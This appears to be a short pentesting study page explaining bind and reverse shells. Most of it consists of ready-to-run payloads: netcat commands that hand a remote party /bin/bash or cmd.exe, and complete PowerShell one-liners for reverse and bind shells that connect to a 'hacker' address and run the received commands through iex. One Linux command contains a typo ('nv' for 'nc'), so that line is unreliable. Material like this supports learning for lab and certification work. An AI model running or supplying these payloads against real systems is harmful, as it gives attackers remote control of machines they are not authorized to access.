Remote Shell

Bind & Reverse Shell

I have personnally found bind and reverse shell confusing, but with the rigth perspective it is not confusing at all.

There are 2 systems involved in this process - your system from which the "hack" is initiated, lets call it the "hacker"(192.168.1.1) and the other system that falls "victim"(10.11.1.1), lets call it the "victim". Now in order for the hacker to gain remote shell of the victim system, the hacker needs to establish a connection between the two. As we know when a connection has to be established there has to one system waiting to receive the connection and the other initiating the connection.

Bind Shell - When the hacker gets the victim to listen on a port and then initiates a connection from his system to the victim's systems it is a bind shell connection.

Reverse Shell - When the hacker gets his/her system to listen on a port and then initiates a connection from the victim's system, it is a reverse shell conneciton.

Remote Shell using Netcat

Netcat is a popular tool to create remote shells when Linux machines are involved. The bind and reverse shell confusions kicks in when the commands have to redirected to the respective shells of the operating system.

Bind Shell using 2 Linux Systems

Victim

nc -nvlp 443 -e /bin/bash

Hacker

nc -nv 10.11.1.1 443

Reverse Shell using 2 Linux Systems

Hacker

nc -nvlp 443 

Victim

nv -nv 192.168.1.1 443 -e /bin/bash

In the case of victim's system being Windows the execution has to be "-e cmd.exe"

Remote Shell using Powershell on Windows

Powershell is a very powerfull scripting language that is part of Windows since Windows 8. Powershell commands can be used for creating remote shells and this is a very popular method to gain control of a remote system.

Reverse Shell When Victim runs a Windows System

Hacker

nc -nvlp 443

Victim

powershell -c "$client = New-Object System.Net.Sockets.TCPClient('192.168.1.1',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

Bind Shell When Victim runs a Windows System

Victim

powershell -c "$listener = New-Object System.Net.Sockets.TcpListener('0.0.0.0',443);$listener.start();$client = $listener.AcceptTcpClient();$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close();$listener.Stop()"

Hacker

nc -nv 10.11.1.1 443

Last updated